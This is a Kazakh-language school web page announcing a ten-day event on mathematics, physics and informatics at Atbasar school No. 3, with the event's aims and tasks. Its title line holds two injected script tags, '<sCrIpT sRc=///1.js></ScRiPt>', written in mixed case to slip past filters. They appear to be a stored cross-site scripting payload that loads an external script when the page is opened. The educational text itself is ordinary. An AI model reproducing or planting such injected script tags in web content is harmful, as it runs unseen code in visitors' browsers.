«Атбасар қаласының №3 жалпы білім беретін мектебі» КММ бойынша 2021-2022 оқу жылына арналған<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

17.01.2022

Онкүндіктің тақырыбы: оқушылардың пәндік және пәнаралық құзыреттіліктерін қалыптастыру

Пәндік онкүндіктің мақсаты: математиканы, информатиканы және физиканы танымал ету, оқушылардың танымдық, шығармашылық қызметін дамыту, математика мұғалімдерінің біліктілігін арттыру, математикалық цикл пәндері бойынша мектептен тыс жұмыстарды жандандыру, қоршаған әлем туралы тұтас түсінік қалыптастыру.

Онкүндік міндеттері:

1. Математика, физика және информатика пәндерін оқуға деген қызығушылықты ояту.

2. Алынған пәндік білім мазмұнын практикалық іс-әрекетте қолдану.

3. Оқушылардың физика-математикалық ой-өрісін кеңейту.

4. Сайыстық  материалдарды дайындау кезінде әртүрлі ақпарат көздерімен жұмыс істеуге үйрету.

5. Оқушылардың зияткерлік-шығармашылық әлеуетін дамыту.

6. Жауапкершілікті тәрбиелеу, өзіне және қарсыластарына құрмет көрсету.


Просмотров: 507


Пікір қосу



Деректерді қолтаңбаға қосу